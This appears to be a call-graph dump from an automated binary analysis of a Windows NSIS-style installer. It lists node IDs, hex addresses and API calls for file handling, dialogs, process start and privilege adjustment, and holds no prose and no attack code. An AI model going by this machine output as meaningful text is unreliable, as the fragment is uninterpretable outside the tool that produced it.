3555->3580 3588 406301 MoveFileExW 3555->3588 3556->3541 3557->3526 3558->3555 3598 406541 lstrcpynW 3560->3598 3562 405f29 3563 405ebb 4 API calls 3562->3563 3564 405f2f 3563->3564 3565 405c6d 3564->3565 3566 4067ef 5 API calls 3564->3566 3565->3524 3565->3525 3572 405f3f 3566->3572 3567 405f70 lstrlenW 3568 405f7b 3567->3568 3567->3572 3570 405e10 3 API calls 3568->3570 3569 40689e 2 API calls 3569->3572 3571 405f80 GetFileAttributesW 3570->3571 3571->3565 3572->3565 3572->3567 3572->3569 3573 405e5c 2 API calls 3572->3573 3573->3567 3574->3529 3576 405e6a 3575->3576 3577 405e70 CharPrevW 3576->3577 3578 405e7c 3576->3578 3577->3576 3577->3578 3578->3532 3579->3546 3599 40600c GetFileAttributesW 3580->3599 3583 405c32 3583->3555 3584 405c20 RemoveDirectoryW 3586 405c2e 3584->3586 3585 405c28 DeleteFileW 3585->3586 3586->3583 3587 405c3e SetFileAttributesW 3586->3587 3587->3583 3589 406322 3588->3589 3590 406315 3588->3590 3589->3555 3602 406187 3590->3602 3593 4068b4 FindClose 3592->3593 3594 405dd1 3592->3594 3593->3594 3594->3526 3594->3538 3596 405ddb 3595->3596 3597 405e2c lstrcatW 3595->3597 3596->3542 3597->3596 3598->3562 3600 405c11 3599->3600 3601 40601e SetFileAttributesW 3599->3601 3600->3583 3600->3584 3600->3585 3601->3600 3603 4061b7 3602->3603 3604 4061dd GetShortPathNameW 3602->3604 3629 406031 GetFileAttributesW CreateFileW 3603->3629 3606 4061f2 3604->3606 3607 4062fc 3604->3607 3606->3607 3608 4061fa wsprintfA 3606->3608 3607->3589 3610 40657e 21 API calls 3608->3610 3609 4061c1 CloseHandle GetShortPathNameW 3609->3607 3611 4061d5 3609->3611 3612 406222 3610->3612 3611->3604 3611->3607 3630 406031 GetFileAttributesW CreateFileW 3612->3630 3614 40622f 3614->3607 3615 40623e GetFileSize GlobalAlloc 3614->3615 3616 406260 3615->3616 3617 4062f5 CloseHandle 3615->3617 3631 4060b4 ReadFile 3616->3631 3617->3607 3622 406293 3624 405f96 4 API calls 3622->3624 3623 40627f lstrcpyA 3625 4062a1 3623->3625 3624->3625 3626 4062d8 SetFilePointer 3625->3626 3638 4060e3 WriteFile 3626->3638 3629->3609 3630->3614 3632 4060d2 3631->3632 3632->3617 3633 405f96 lstrlenA 3632->3633 3634 405fd7 lstrlenA 3633->3634 3635 405fb0 lstrcmpiA 3634->3635 3636 405fdf 3634->3636 3635->3636 3637 405fce CharNextA 3635->3637 3636->3622 3636->3623 3637->3634 3639 406101 GlobalFree 3638->3639 3639->3617 3640 405b67 ShellExecuteExW 4218 401c68 4219 402da9 21 API calls 4218->4219 4220 401c6f 4219->4220 4221 402da9 21 API calls 4220->4221 4222 401c7c 4221->4222 4223 401c91 4222->4223 4224 402dcb 21 API calls 4222->4224 4225 401ca1 4223->4225 4226 402dcb 21 API calls 4223->4226 4224->4223 4227 401cf8 4225->4227 4228 401cac 4225->4228 4226->4225 4229 402dcb 21 API calls 4227->4229 4230 402da9 21 API calls 4228->4230 4231 401cfd 4229->4231 4232 401cb1 4230->4232 4233 402dcb 21 API calls 4231->4233 4234 402da9 21 API calls 4232->4234 4236 401d06 FindWindowExW 4233->4236 4235 401cbd 4234->4235 4237 401ce8 SendMessageW 4235->4237 4238 401cca SendMessageTimeoutW 4235->4238 4239 401d28 4236->4239 4237->4239 4238->4239 4247 4028e9 4248 4028ef 4247->4248 4249 4028f7 FindClose 4248->4249 4250 402c4f 4248->4250 4249->4250 4251 40496a 4252 4049a0 4251->4252 4253 40497a 4251->4253 4254 404527 8 API calls 4252->4254 4255 4044c0 22 API calls 4253->4255 4256 4049ac 4254->4256 4257 404987 SetDlgItemTextW 4255->4257 4257->4252 4258 4016f1 4259 402dcb 21 API calls 4258->4259 4260 4016f7 GetFullPathNameW 4259->4260 4261 401711 4260->4261 4267 401733 4260->4267 4263 40689e 2 API calls 4261->4263 4261->4267 4262 401748 GetShortPathNameW 4264 402c4f 4262->4264 4265 401723 4263->4265 4265->4267 4268 406541 lstrcpynW 4265->4268 4267->4262 4267->4264 4268->4267 4269 401e73 GetDC 4270 402da9 21 API calls 4269->4270 4271 401e85 GetDeviceCaps MulDiv ReleaseDC 4270->4271 4272 402da9 21 API calls 4271->4272 4273 401eb6 4272->4273 4274 40657e 21 API calls 4273->4274 4275 401ef3 CreateFontIndirectW 4274->4275 4276 40265d 4275->4276 4277 402975 4278 402dcb 21 API calls 4277->4278 4279 402981 4278->4279 4280 402997 4279->4280 4281 402dcb 21 API calls 4279->4281 4282 40600c 2 API calls 4280->4282 4281->4280 4283 40299d 4282->4283 4305 406031 GetFileAttributesW CreateFileW 4283->4305 4285 4029aa 4286 402a60 4285->4286 4289 4029c5 GlobalAlloc 4285->4289 4290 402a48 4285->4290 4287 402a67 DeleteFileW 4286->4287 4288 402a7a 4286->4288 4287->4288 4289->4290 4292 4029de 4289->4292 4291 4032d9 39 API calls 4290->4291 4294 402a55 CloseHandle 4291->4294 4306 4034d4 SetFilePointer 4292->4306 4294->4286 4295 4029e4 4296 4034be ReadFile 4295->4296 4297 4029ed GlobalAlloc 4296->4297 4298 402a31 4297->4298 4299 4029fd 4297->4299 4301 4060e3 WriteFile 4298->4301 4300 4032d9 39 API calls 4299->4300 4304 402a0a 4300->4304 4302 402a3d GlobalFree 4301->4302 4302->4290 4303 402a28 GlobalFree 4303->4298 4304->4303 4305->4285 4306->4295 4307 4014f5 SetForegroundWindow 4308 402c4f 4307->4308 4309 4045f6 lstrcpynW lstrlenW 4310 40197b 4311 402dcb 21 API calls 4310->4311 4312 401982 lstrlenW 4311->4312 4313 40265d 4312->4313 4314 4020fd 4315 40210f 4314->4315 4325 4021c1 4314->4325 4316 402dcb 21 API calls 4315->4316 4318 402116 4316->4318 4317 401423 28 API calls 4321 40231b 4317->4321 4319 402dcb 21 API calls 4318->4319 4320 40211f 4319->4320 4322 402135 LoadLibraryExW 4320->4322 4323 402127 GetModuleHandleW 4320->4323 4324 402146 4322->4324 4322->4325 4323->4322 4323->4324 4334 4069a4 4324->4334 4325->4317 4328 402190 4330 4055c6 28 API calls 4328->4330 4329 402157 4331 401423 28 API calls 4329->4331 4332 402167 4329->4332 4330->4332 4331->4332 4332->4321 4333 4021b3 FreeLibrary 4332->4333 4333->4321 4339 406563 WideCharToMultiByte 4334->4339 4336 4069c1 4337 4069c8 GetProcAddress 4336->4337 4338 402151 4336->4338 4337->4338 4338->4328 4338->4329 4339->4336 4340 402b7e 4341 402bd0 4340->4341 4342 402b85 4340->4342 4343 406935 5 API calls 4341->4343 4344 402da9 21 API calls 4342->4344 4348 402bce 4342->4348 4345 402bd7 4343->4345 4347 402b93 4344->4347 4346 402dcb 21 API calls 4345->4346 4349 402be0 4346->4349 4350 402da9 21 API calls 4347->4350 4349->4348 4351 402be4 IIDFromString 4349->4351 4352 402b9f 4350->4352 4351->4348 4353 402bf3 4351->4353 4357 406488 wsprintfW 4352->4357 4353->4348 4358 406541 lstrcpynW 4353->4358 4355 402c10 CoTaskMemFree 4355->4348 4357->4348 4358->4355 4366 40467f 4367 404697 4366->4367 4374 4047b1 4366->4374 4371 4044c0 22 API calls 4367->4371 4368 40481b 4369 4048e5 4368->4369 4370 404825 GetDlgItem 4368->4370 4376 404527 8 API calls 4369->4376 4372 4048a6 4370->4372 4373 40483f 4370->4373 4375 4046fe 4371->4375 4372->4369 4381 4048b8 4372->4381 4373->4372 4380 404865 SendMessageW LoadCursorW SetCursor 4373->4380 4374->4368 4374->4369 4377 4047ec GetDlgItem SendMessageW 4374->4377 4378 4044c0 22 API calls 4375->4378 4379 4048e0 4376->4379 4399 4044e2 KiUserCallbackDispatcher 4377->4399 4384 40470b CheckDlgButton 4378->4384 4403 40492e 4380->4403 4386 4048ce 4381->4386 4387 4048be SendMessageW 4381->4387 4383 404816 4400 40490a 4383->4400 4397 4044e2 KiUserCallbackDispatcher 4384->4397 4386->4379 4391 4048d4 SendMessageW 4386->4391 4387->4386 4391->4379 4392 404729 GetDlgItem 4398 4044f5 SendMessageW 4392->4398 4394 40473f SendMessageW 4395 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4394->4395 4396 40475c GetSysColor 4394->4396 4395->4379 4396->4395 4397->4392 4398->4394 4399->4383 4401 404918 4400->4401 4402 40491d SendMessageW 4400->4402 4401->4402 4402->4368 4406 405b67 ShellExecuteExW 4403->4406 4405 404894 LoadCursorW SetCursor 4405->4372 4406->4405 4407 401000 4408 401037 BeginPaint GetClientRect 4407->4408 4409 40100c DefWindowProcW 4407->4409 4411 4010f3 4408->4411 4412 401179 4409->4412 4413 401073 CreateBrushIndirect FillRect DeleteObject 4411->4413 4414 4010fc 4411->4414 4413->4411 4415 401102 CreateFontIndirectW 4414->4415 4416 401167 EndPaint 4414->4416 4415->4416 4417 401112 6 API calls 4415->4417 4416->4412 4417->4416 4418 402a80 4419 402da9 21 API calls 4418->4419 4420 402a86 4419->4420 4421 402ac9 4420->4421 4422 402aad 4420->4422 4428 402953 4420->4428 4424 402ae3 4421->4424 4425 402ad3 4421->4425 4423 402ab2 4422->4423 4431 402ac3 4422->4431 4432 406541 lstrcpynW 4423->4432 4427 40657e 21 API calls 4424->4427 4426 402da9 21 API calls 4425->4426 4426->4431 4427->4431 4431->4428 4433 406488 wsprintfW 4431->4433 4432->4428 4433->4428 4434 401781 4435 402dcb 21 API calls 4434->4435 4436 401788 4435->4436 4437 406060 2 API calls 4436->4437 4438 40178f 4437->4438 4438->4438 4439 401d82 4440 402da9 21 API calls 4439->4440 4441 401d93 SetWindowLongW 4440->4441 4442 402c4f 4441->4442 4443 401503 4444 401508 4443->4444 4445 40152e 4443->4445 4446 402da9 21 API calls 4444->4446 4446->4445 4447 402903 4448 40290b 4447->4448 4449 40290f FindNextFileW 4448->4449 4452 402921 4448->4452 4450 402968 4449->4450 4449->4452 4453 406541 lstrcpynW 4450->4453 4453->4452 3410 405705 3411 405726 GetDlgItem GetDlgItem GetDlgItem 3410->3411 3412 4058af 3410->3412 3455 4044f5 SendMessageW 3411->3455 3414 4058e0 3412->3414 3415 4058b8 GetDlgItem CreateThread CloseHandle 3412->3415 3417 40590b 3414->3417 3418 405930 3414->3418 3419 4058f7 ShowWindow ShowWindow 3414->3419 3415->3414 3469 405699 OleInitialize 3415->3469 3416 405796 3425 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3416->3425 3420 40596b 3417->3420 3422 405945 ShowWindow 3417->3422 3423 40591f 3417->3423 3424 404527 8 API calls 3418->3424 3457 4044f5 SendMessageW 3419->3457 3420->3418 3426 405979 SendMessageW 3420->3426 3429 405965 3422->3429 3430 405957 3422->3430 3427 404499 SendMessageW 3423->3427 3428 40593e 3424->3428 3431 40580b 3425->3431 3432 4057ef SendMessageW SendMessageW 3425->3432 3426->3428 3433 405992 CreatePopupMenu 3426->3433 3427->3418 3437 404499 SendMessageW 3429->3437 3458 4055c6 3430->3458 3434 405810 SendMessageW 3431->3434 3435 40581e 3431->3435 3432->3431 3438 40657e 21 API calls 3433->3438 3434->3435 3439 4044c0 22 API calls 3435->3439 3437->3420 3440 4059a2 AppendMenuW 3438->3440 3441 40582e 3439->3441 3442 4059d2 TrackPopupMenu 3440->3442 3443 4059bf GetWindowRect 3440->3443 3444 405837 ShowWindow 3441->3444 3445 40586b GetDlgItem SendMessageW 3441->3445 3442->3428 3446 4059ed 3442->3446 3443->3442 3447 40585a 3444->3447 3448 40584d ShowWindow 3444->3448 3445->3428 3449 405892 SendMessageW SendMessageW 3445->3449 3450 405a09 SendMessageW 3446->3450 3456 4044f5 SendMessageW 3447->3456 3448->3447 3449->3428 3450->3450 3451 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3450->3451 3453 405a4b SendMessageW 3451->3453 3453->3453 3454 405a74 GlobalUnlock SetClipboardData CloseClipboard 3453->3454 3454->3428 3455->3416 3456->3445 3457->3417 3459 4055e1 3458->3459 3467 405683 3458->3467 3460 4055fd lstrlenW 3459->3460 3461 40657e 21 API calls 3459->3461 3462 405626 3460->3462 3463 40560b lstrlenW 3460->3463 3461->3460 3465 405639 3462->3465 3466 40562c SetWindowTextW 3462->3466 3464 40561d lstrcatW 3463->3464 3463->3467 3464->3462 3465->3467 3468 40563f SendMessageW SendMessageW SendMessageW 3465->3468 3466->3465 3467->3429 3468->3467 3470 40450c SendMessageW 3469->3470 3471 4056bc 3470->3471 3474 401389 2 API calls 3471->3474 3475 4056e3 3471->3475 3472 40450c SendMessageW 3473 4056f5 CoUninitialize 3472->3473 3474->3471 3475->3472 4454 404d07 4455 404d33 4454->4455 4456 404d17 4454->4456 4458 404d66 4455->4458 4459 404d39 SHGetPathFromIDListW 4455->4459 4465 405b85 GetDlgItemTextW 4456->4465 4461 404d50 SendMessageW 4459->4461 4462 404d49 4459->4462 4460 404d24 SendMessageW 4460->4455 4461->4458 4464 40140b 2 API calls 4462->4464 4464->4461 4465->4460 4466 401588 4467 402bc9 4466->4467 4470 406488 wsprintfW 4467->4470 4469 402bce 4470->4469 4471 40198d 4472 402da9 21 API calls 4471->4472 4473 401994 4472->4473 4474 402da9 21 API calls 4473->4474 4475 4019a1 4474->4475 4476 402dcb 21 API calls 4475->4476 4477 4019b8 lstrlenW 4476->4477 4479 4019c9 4477->4479 4478 401a0a 4479->4478 4483 406541 lstrcpynW 4479->4483 4481 4019fa 4481->4478 4482 4019ff lstrlenW 4481->4482 4482->4478 4483->4481 4484 40168f 4485 402dcb 21 API calls 4484->4485 4486 401695 4485->4486 4487 40689e 2 API calls 4486->4487 4488 40169b 4487->4488 4489 402b10 4490 402da9 21 API calls 4489->4490 4491 402b16 4490->4491 4492 402953 4491->4492 4493 40657e 21 API calls 4491->4493 4493->4492 4494 402711 4495 402da9 21 API calls 4494->4495 4496 402720 4495->4496 4497 40276a ReadFile 4496->4497 4498 4060b4 ReadFile 4496->4498 4499 406112 5 API calls 4496->4499 4500 4027aa MultiByteToWideChar 4496->4500 4501 40285f 4496->4501 4503 4027d0 SetFilePointer MultiByteToWideChar 4496->4503 4504 402870 4496->4504 4506 40285d 4496->4506 4497->4496 4497->4506 4498->4496 4499->4496 4500->4496 4507 406488 wsprintfW 4501->4507 4503->4496 4505 402891 SetFilePointer 4504->4505 4504->4506 4505->4506 4507->4506 4508 401491 4509 4055c6 28 API calls 4508->4509 4510 401498 4509->4510 3774 401794 3775 402dcb 21 API calls 3774->3775 3776 40179b 3775->3776 3777 4017c3 3776->3777 3778 4017bb 3776->3778 3814 406541 lstrcpynW 3777->3814 3813 406541 lstrcpynW 3778->3813 3781 4017ce 3783 405e10 3 API calls 3781->3783 3782 4017c1 3785 4067ef 5 API calls 3782->3785 3784 4017d4 lstrcatW 3783->3784 3784->3782 3787 4017e0 3785->3787 3786 40689e 2 API calls 3786->3787 3787->3786 3788 40600c 2 API calls 3787->3788 3790 4017f2 CompareFileTime 3787->3790 3791 4018b2 3787->3791 3792 401889 3787->3792 3795 406541 lstrcpynW 3787->3795 3800 40657e 21 API calls 3787->3800 3812 406031 GetFileAttributesW CreateFileW 3787->3812 3815 405ba1 3787->3815 3788->3787 3790->3787 3793 4055c6 28 API calls 3791->3793 3794 4055c6 28 API calls 3792->3794 3802 40189e 3792->3802 3796 4018bc 3793->3796 3794->3802 3795->3787 3797 4032d9 39 API calls 3796->3797 3798 4018cf 3797->3798 3799 4018e3 SetFileTime 3798->3799 3801 4018f5 CloseHandle 3798->3801 3799->3801 3800->3787 3801->3802 3803 401906 3801->3803 3804 40190b 3803->3804 3805 40191e 3803->3805 3807 40657e 21 API calls 3804->3807 3806 40657e 21 API calls 3805->3806 3809 401926 3806->3809 3808 401913 lstrcatW 3807->3808 3808->3809 3811 405ba1 MessageBoxIndirectW 3809->3811 3811->3802 3812->3787 3813->3782 3814->3781 3816 405bb6 3815->3816 3817 405c02 3816->3817 3818 405bca MessageBoxIndirectW 3816->3818 3817->3787 3818->3817 4525 401a97 4526 402da9 21 API calls 4525->4526 4527 401aa0 4526->4527 4528 402da9 21 API calls 4527->4528 4529 401a45 4528->4529 4530 401598 4531 4015b1 4530->4531 4532 4015a8 ShowWindow 4530->4532 4533 402c4f 4531->4533 4534 4015bf ShowWindow 4531->4534 4532->4531 4534->4533 3858 402419 3859 402dcb 21 API calls 3858->3859 3860 402428 3859->3860 3861 402dcb 21 API calls 3860->3861 3862 402431 3861->3862 3863 402dcb 21 API calls 3862->3863 3864 40243b GetPrivateProfileStringW 3863->3864 4535 40201b 4536 402dcb 21 API calls 4535->4536 4537 402022 4536->4537 4538 40689e 2 API calls 4537->4538 4539 402028 4538->4539 4541 402039 4539->4541 4542 406488 wsprintfW 4539->4542 4542->4541 3865 40351c SetErrorMode GetVersionExW 3866 403570 GetVersionExW 3865->3866 3867 4035a8 3865->3867 3866->3867 3868 4035ff 3867->3868 3869 406935 5 API calls 3867->3869 3870 4068c5 3 API calls 3868->3870 3869->3868 3871 403615 lstrlenA 3870->3871 3871->3868 3872 403625 3871->3872 3873 406935 5 API calls 3872->3873 3874 40362c 3873->3874 3875 406935 5 API calls 3874->3875 3876 403633 3875->3876 3877 406935 5 API calls 3876->3877 3878 40363f #17 OleInitialize SHGetFileInfoW 3877->3878 3953 406541 lstrcpynW 3878->3953 3881 40368e GetCommandLineW 3954 406541 lstrcpynW 3881->3954 3883 4036a0 3884 405e3d CharNextW 3883->3884 3885 4036c6 CharNextW 3884->3885 3888 4036d8 3885->3888 3886 4037da 3887 4037ee GetTempPathW 3886->3887 3955 4034eb 3887->3955 3888->3886 3888->3888 3891 405e3d CharNextW 3888->3891 3900 4037dc 3888->3900 3890 403806 3892 403860 DeleteFileW 3890->3892 3893 40380a GetWindowsDirectoryW lstrcatW 3890->3893 3891->3888 3965 4030a2 GetTickCount GetModuleFileNameW 3892->3965 3895 4034eb 12 API calls 3893->3895 3897 403826 3895->3897 3896 403874 3898 40392b 3896->3898 3902 40391b 3896->3902 3906 405e3d CharNextW 3896->3906 3897->3892 3899 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3897->3899 4054 403b39 3898->4054 3904 4034eb 12 API calls 3899->3904 4049 406541 lstrcpynW 3900->4049 3993 403c13 3902->3993 3908 403858 3904->3908 3920 403893 3906->3920 3908->3892 3908->3898 3909 403a79 3911 405ba1 MessageBoxIndirectW 3909->3911 3910 403a9d 3912 403b21 ExitProcess 3910->3912 3913 403aa5 GetCurrentProcess OpenProcessToken 3910->3913 3915 403a87 ExitProcess 3911->3915 3916 403af1 3913->3916 3917 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3913->3917 3922 406935 5 API calls 3916->3922 3917->3916 3918 4038f1 3923 405f18 18 API calls 3918->3923 3919 403934 3921 405b0c 5 API calls 3919->3921 3920->3918 3920->3919 3924 403939 lstrlenW 3921->3924 3925 403af8 3922->3925 3926 4038fd 3923->3926 4052 406541 lstrcpynW 3924->4052 3928 403b0d ExitWindowsEx 3925->3928 3930 403b1a 3925->3930 3926->3898 4050 406541 lstrcpynW 3926->4050 3928->3912 3928->3930 3933 40140b 2 API calls 3930->3933 3931 403953 3934 40395c 3931->3934 3950 40396b 3931->3950 3932 403910 4051 406541 lstrcpynW 3932->4051 3933->3912 4053 406541 lstrcpynW 3934->4053 3937 403991 wsprintfW 3938 40657e 21 API calls 3937->3938 3938->3950 3939 405a95 2 API calls 3939->3950 3940 405aef 2 API calls 3940->3950 3941 403a07 SetCurrentDirectoryW 3943 406301 40 API calls 3941->3943 3942 4039cd GetFileAttributesW 3944 4039d9 DeleteFileW 3942->3944 3942->3950 3945 403a16 CopyFileW 3943->3945 3944->3950 3945->3898 3945->3950 3946 405c4d 71 API calls 3946->3950 3947 406301 40 API calls 3947->3950 3948 40657e 21 API calls 3948->3950 3949 405b24 2 API calls 3949->3950 3950->3898 3950->3937 3950->3939 3950->3940 3950->3941 3950->3942 3950->3946 3950->3947 3950->3948 3950->3949 3951 403a8f CloseHandle 3950->3951 3952 40689e 2 API calls 3950->3952 3951->3898 3952->3950 3953->3881 3954->3883 3956 4067ef 5 API calls 3955->3956 3958 4034f7 3956->3958 3957 403501 3957->3890 3958->3957 3959 405e10 3 API calls 3958->3959 3960 403509 3959->3960 3961 405aef 2 API calls 3960->3961 3962 40350f 3961->3962 4061 406060 3962->4061 4065 406031 GetFileAttributesW CreateFileW 3965->4065 3967 4030e2 3986 4030f2 3967->3986 4066 406541 lstrcpynW 3967->4066 3969 403108 3970 405e5c 2 API calls 3969->3970 3971 40310e 3970->3971 4067 406541 lstrcpynW 3971->4067 3973 403119 GetFileSize 3974 403213 3973->3974 3988 403130 3973->3988 4068 40303e 3974->4068 3976 40321c 3978 40324c GlobalAlloc 3976->3978 3976->3986 4080 4034d4 SetFilePointer 3976->4080 3977 4034be ReadFile 3977->3988 4079 4034d4 SetFilePointer 3978->4079 3980 40327f 3983 40303e 6 API calls 3980->3983 3982 403267 3985 4032d9 39 API calls 3982->3985 3983->3986 3984 403235 3987 4034be ReadFile 3984->3987 3991 403273 3985->3991 3986->3896 3989 403240 3987->3989 3988->3974 3988->3977 3988->3980 3988->3986 3990 40303e 6 API calls 3988->3990 3989->3978 3989->3986 3990->3988 3991->3986 3991->3991 3992 4032b0 SetFilePointer 3991->3992 3992->3986 3994 406935 5 API calls 3993->3994 3995 403c27 3994->3995 3996 403c2d 3995->3996 3997 403c3f 3995->3997 4089 406488 wsprintfW 3996->4089 3998 40640f 3 API calls 3997->3998 3999 403c6f 3998->3999 4000 403c8e lstrcatW 3999->4000 4002 40640f 3 API calls 3999->4002 4003 403c3d 4000->4003 4002->4000 4081 403ee9 4003->4081 4006 405f18 18 API calls 4007 403cc0 4006->4007 4008 403d54 4007->4008 4010 40640f 3 API calls 4007->4010 4009 405f18 18 API calls 4008->4009 4011 403d5a 4009->4011 4017 403cf2 4010->4017 4012 403d6a LoadImageW 4011->4012 4013 40657e 21 API calls 4011->4013 4014 403e10 4012->4014 4015 403d91 RegisterClassW 4012->4015 4013->4012 4019 40140b 2 API calls 4014->4019 4018 403dc7 SystemParametersInfoW CreateWindowExW 4015->4018 4048 403e1a 4015->4048 4016 403d13 lstrlenW 4021 403d21 lstrcmpiW 4016->4021 4022 403d47 4016->4022 4017->4008 4017->4016 4020 405e3d CharNextW 4017->4020 4018->4014 4023 403e16 4019->4023 4024 403d10 4020->4024 4021->4022 4025 403d31 GetFileAttributesW 4021->4025 4026 405e10 3 API calls 4022->4026 4028 403ee9 22 API calls 4023->4028 4023->4048 4024->4016 4027 403d3d 4025->4027 4029 403d4d 4026->4029 4027->4022 4030 405e5c 2 API calls 4027->4030 4031 403e27 4028->4031 4090 406541 lstrcpynW 4029->4090 4030->4022 4033 403e33 ShowWindow 4031->4033 4034 403eb6 4031->4034 4036 4068c5 3 API calls 4033->4036 4035 405699 5 API calls 4034->4035 4037 403ebc 4035->4037 4038 403e4b 4036->4038 4039 403ec0 4037->4039 4040 403ed8 4037->4040 4041 403e59 GetClassInfoW 4038->4041 4043 4068c5 3 API calls 4038->4043 4047 40140b 2 API calls 4039->4047 4039->4048 4042 40140b 2 API calls 4040->4042 4044 403e83 DialogBoxParamW 4041->4044 4045 403e6d GetClassInfoW RegisterClassW 4041->4045 4042->4048 4043->4041 4046 40140b 2 API calls 4044->4046 4045->4044 4046->4048 4047->4048 4048->3898 4049->3887 4050->3932 4051->3902 4052->3931 4053->3950 4055 403b51 4054->4055 4056 403b43 CloseHandle 4054->4056 4092 403b7e 4055->4092 4056->4055 4059 405c4d 71 API calls 4060 403a6c OleUninitialize 4059->4060 4060->3909 4060->3910 4062 40606d GetTickCount GetTempFileNameW 4061->4062 4063 40351a 4062->4063 4064 4060a3 4062->4064 4063->3890 4064->4062 4064->4063 4065->3967 4066->3969 4067->3973 4069 403047 4068->4069 4070 40305f 4068->4070 4071 403050 DestroyWindow 4069->4071 4072 403057 4069->4072 4073 403067 4070->4073 4074 40306f GetTickCount 4070->4074 4071->4072 4072->3976 4075 406971 2 API calls 4073->4075 4076 4030a0 4074->4076 4077 40307d CreateDialogParamW ShowWindow 4074->4077 4078 40306d 4075->4078 4076->3976 4077->4076 4078->3976 4079->3982 4080->3984 4082 403efd 4081->4082 4091 406488 wsprintfW 4082->4091 4084 403f6e 4085 403fa2 22 API calls 4084->4085 4087 403f73 4085->4087 4086 403c9e 4086->4006 4087->4086 4088 40657e 21 API calls 4087->4088 4088->4087 4089->4003 4090->4008 4091->4084 4093 403b8c 4092->4093 4094 403b56 4093->4094 4095 403b91 FreeLibrary GlobalFree 4093->4095 4094->4059 4095->4094 4095->4095 4550 401b9c 4551 402dcb 21 API calls 4550->4551 4552 401ba3 4551->4552 4553 402da9 21 API calls 4552->4553 4554 401bac wsprintfW 4553->4554 4555 402c4f 4554->4555 4556 40149e 4557 4014ac PostQuitMessage 4556->4557 4558 4023c2 4556->4558 4557->4558 4559 4016a0 4560 402dcb 21 API calls 4559->4560 4561 4016a7 4560->4561 4562 402dcb 21 API calls 4561->4562 4563 4016b0 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b9 MoveFileW 4564->4565 4566 4016c5 4565->4566 4567 4016cc 4565->4567 4569 401423 28 API calls 4566->4569 4568 40689e 2 API calls 4567->4568 4571 40231b 4567->4571 4570 4016db 4568->4570 4569->4571 4570->4571 4572 406301 40 API calls 4570->4572 4572->4566 4573 401a24 4574 402dcb 21 API calls 4573->4574 4575 401a2b 4574->4575 4576 402dcb 21 API calls 4575->4576 4577 401a34 4576->4577 4578 401a3b lstrcmpiW 4577->4578 4579 401a4d lstrcmpW 4577->4579 4580 401a41 4578->4580 4579->4580 4581 402324 4582 402dcb 21 API calls 4581->4582 4583 40232a 4582->4583 4584 402dcb 21 API calls 4583->4584 4585 402333 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 40233c 4586->4587 4588 40689e 2 API calls 4587->4588 4589 402345 4588->4589 4590 402356 lstrlenW lstrlenW 4589->4590 4594 402349 4589->4594 4592 4055c6 28 API calls 4590->4592 4591 4055c6 28 API calls 4595 402351 4591->4595 4593 402394 SHFileOperationW 4592->4593 4593->4594 4593->4595 4594->4591 4594->4595 4596 401da6 4597 401db9 GetDlgItem 4596->4597 4598 401dac 4596->4598 4600 401db3 4597->4600 4599 402da9 21 API calls 4598->4599 4599->4600 4601 401dfa GetClientRect LoadImageW SendMessageW 4600->4601 4603 402dcb 21 API calls 4600->4603 4604 401e58 4601->4604 4606 401e64 4601->4606 4603->4601 4605 401e5d DeleteObject 4604->4605 4604->4606 4605->4606 4607 4023a8 4608 4023af 4607->4608 4611 4023c2 4607->4611 4609 40657e 21 API calls 4608->4609 4610 4023bc 4609->4610 4612 405ba1 MessageBoxIndirectW 4610->4612 4612->4611 4613 402c2a SendMessageW 4614 402c44 InvalidateRect 4613->4614 4615 402c4f 4613->4615 4614->4615 4623 404f2d GetDlgItem GetDlgItem 4624 404f7f 7 API calls 4623->4624 4628 4051a4 4623->4628 4625 405026 DeleteObject 4624->4625 4626 405019 SendMessageW 4624->4626 4627 40502f 4625->4627 4626->4625 4629 405066 4627->4629 4632 40657e 21 API calls 4627->4632 4640 405286 4628->4640 4652 405213 4628->4652 4677 404e7b SendMessageW 4628->4677 4630 4044c0 22 API calls 4629->4630 4633 40507a 4630->4633 4631 405332 4635 405344 4631->4635 4636 40533c SendMessageW 4631->4636 4637 405048 SendMessageW SendMessageW 4632->4637 4638 4044c0 22 API calls 4633->4638 4634 405197 4642 404527 8 API calls 4634->4642 4647 405356 ImageList_Destroy 4635->4647 4648 40535d 4635->4648 4653 40536d 4635->4653 4636->4635 4637->4627 4656 40508b 4638->4656 4639 4052df SendMessageW 4639->4634 4645 4052f4 SendMessageW 4639->4645 4640->4631 4640->4634 4640->4639 4641 405278 SendMessageW 4641->4640 4646 405533 4642->4646 4644 4054e7 4644->4634 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4644->4654 4651 405307 4645->4651 4647->4648 4649 405366 GlobalFree 4648->4649 4648->4653 4649->4653 4650 405166 GetWindowLongW SetWindowLongW 4655 40517f 4650->4655 4662 405318 SendMessageW 4651->4662 4652->4640 4652->4641 4653->4644 4670 4053a8 4653->4670 4682 404efb 4653->4682 4654->4634 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4650 4661 4050de SendMessageW 4656->4661 4663 405161 4656->4663 4664 405130 SendMessageW 4656->4664 4665 40511c SendMessageW 4656->4665 4675 4044f5 SendMessageW 4657->4675 4676 4044f5 SendMessageW 4658->4676 4661->4656 4662->4631 4663->4650 4663->4655 4664->4656 4665->4656 4667 4054b2 4668 4054bd InvalidateRect 4667->4668 4671 4054c9 4667->4671 4668->4671 4669 4053d6 SendMessageW 4674 4053ec 4669->4674 4670->4669 4670->4674 4671->4644 4691 404e36 4671->4691 4673 405460 SendMessageW SendMessageW 4673->4674 4674->4667 4674->4673 4675->4634 4676->4628 4678 404eda SendMessageW 4677->4678 4679 404e9e GetMessagePos ScreenToClient SendMessageW 4677->4679 4680 404ed2 4678->4680 4679->4680 4681 404ed7 4679->4681 4680->4652 4681->4678 4694 406541 lstrcpynW 4682->4694 4684 404f0e 4695 406488 wsprintfW 4684->4695 4686 404f18 4687 40140b 2 API calls 4686->4687 4688 404f21 4687->4688 4696 406541 lstrcpynW 4688->4696 4690 404f28 4690->4670 4697 404d6d 4691->4697 4693 404e4b 4693->4644 4694->4684 4695->4686 4696->4690 4698 404d86 4697->4698 4699 40657e 21 API calls 4698->4699 4700 404dea 4699->4700 4701 40657e 21 API calls 4700->4701 4702 404df5 4701->4702 4703 40657e 21 API calls 4702->4703 4704 404e0b lstrlenW wsprintfW 